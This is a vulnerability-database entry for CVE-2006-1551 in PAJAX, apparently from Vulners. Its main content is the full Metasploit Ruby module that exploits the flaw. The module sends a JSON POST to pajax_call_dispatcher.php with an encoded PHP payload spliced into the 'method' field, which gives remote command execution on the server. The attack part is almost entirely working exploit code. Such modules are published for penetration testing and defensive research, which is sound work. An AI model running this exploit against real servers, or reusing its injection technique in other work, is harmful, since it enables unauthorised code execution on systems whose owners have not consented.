Lucene search
K

PAJAX Remote Command Execution

🗓️ 05 Jan 2007 05:38:28Reported by Matteo Cantoni <[email protected]>, hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

PAJAX Remote Command Execution RedTeam identified security flaws in PAJAX (<= 0.5.1). Execute arbitrary PHP code from unchecked user input. Include arbitrary files ending in ".class.php

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-1551
30 Apr 201000:00
circl
CVE
CVE-2006-1551
13 Apr 200622:00
cve
Cvelist
CVE-2006-1551
13 Apr 200622:00
cvelist
Exploit DB
PAJAX - Remote Command Execution (Metasploit)
30 Apr 201000:00
exploitdb
NVD
CVE-2006-1551
13 Apr 200622:02
nvd
Packet Storm
pajax-0.5.1.txt
17 Apr 200600:00
packetstorm
Packet Storm
PAJAX Remote Command Execution
30 Oct 200900:00
packetstorm
Tenable Nessus
PAJAX < 0.5.2 Multiple Vulnerabilities
16 Apr 200600:00
nessus
Prion
Sql injection
13 Apr 200622:02
prion
securityvulns
[Full-disclosure] PAJAX Remote Code Injection and File Inclusion Vulnerability
14 Apr 200600:00
securityvulns
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PAJAX Remote Command Execution',
      'Description'    => %q{
          RedTeam has identified two security flaws in PAJAX (<= 0.5.1).
        It is possible to execute arbitrary PHP code from unchecked user input.
        Additionally, it is possible to include arbitrary files on the server
        ending in ".class.php".
      },
      'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-1551'],
          ['OSVDB', '24618'],
          ['BID', '17519'],
          ['URL', 'http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          'Space'       => 4000,
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2006-03-30',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to pajax_call_dispatcher.php", "/pajax/pajax/pajax_call_dispatcher.php"]),
        OptString.new('MOD', [true, "The PAJAX module name", "Calculator"])
      ])
  end


  def exploit

    args = %Q!{ "id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "#{datastore['MOD']}", "method": "add(1,1);#{payload.encoded};$obj->add", "params": ["1", "5"] }!

    res = send_request_cgi({
      'uri'      => normalize_uri(datastore['URI']),
      'method'   => 'POST',
      'data'     => args,
      'ctype'    => 'text/x-json'
    }, 25)

    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
    else
      print_status("No response from the server")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation